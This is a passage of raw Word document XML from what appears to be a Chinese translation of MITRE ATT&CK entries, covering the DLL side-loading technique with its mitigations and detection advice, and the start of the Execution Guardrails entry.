            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="237FE05D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5E10E431" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="529FC8C7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56E659D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保已经有适当的进程、注册表和文件权限，防止攻击者禁用或干扰安全服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7B389C7F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="490F2542" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65153FAC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保已有适当的用户权限，防止攻击者禁用或干扰安全服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45D8AD5F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247FEB75" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A78A817" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看安全工具是否已经终止或停止运行。监控注册表编辑来查看是否修改了安全工具对应的服务和启动程序。缺少日志或事件文件报告可能是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D56A39" w14:textId="63DC811C" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="0031504F" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>侧</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>载</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="72B284CA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5358EDD0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1073</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A82DFD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FF90C30" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40558001" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，进程监控，已加载动态链接库</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B1C75DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE26E68" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="459D20B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FCAC2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序可能会指定运行时加载的动态链接库。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>程序错误地或含糊地指定了所需动态链接库，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会面临加载意外动态链接库的漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。附带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>加载漏洞尤其会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并列</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>inSxS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清单文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的待</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>加载动态链接库特征不</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>够</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>明显</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时发生</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用易受附带加载漏洞攻击的合法程序来加载恶意动态链接库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73660DD1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用这种技术来掩盖他们在合法、可信的系统或软件进程中执行的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2CF21B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="41A90169" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3050ADEE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="222D5F2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="75BC7DC8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BA7FE9A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46DF0B2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>附带的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sxstrace.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>程序以及手动</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>方式</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来检查清单文件是否存在软件附带加载漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="777E5AAB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B3269F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="381778B4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在写保护位置安装软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3C2E0ED0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="456944B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>软件升级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="727CE36F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期更新软件，包括安装动态链接库附带加载漏洞的修复补丁。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DFB1435" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34431C82" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA9663F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程的异常活动（例如，不使用网络的进程开始这使用网络）。跟踪动态链接库元数据（比如哈希），将进程执行时加载的动态链接库与以前的执行进行比较，检测与打补丁或软件更新无关的活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C42926" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行护栏</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="53F5E59C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6B5B5E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B40F87" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B40F87">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:t xml:space="preserve"> T1480</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="179CE058" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B40F87" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78575679" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B40F87" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B40F87">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499D5D3D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B40F87" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B40F87">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="350EBB9C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B40F87" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B40F87">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11403055" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B40F87" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>防病毒、主机取证分析、基于签名的检测、静态文件分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668AEC7E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B40F87" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B40F87">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00B40F87">
              <w:t>: Nick Carr, FireEye</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A9F7FC7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B40F87">
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B76764E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA53FA4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00933429">
        <w:rPr>
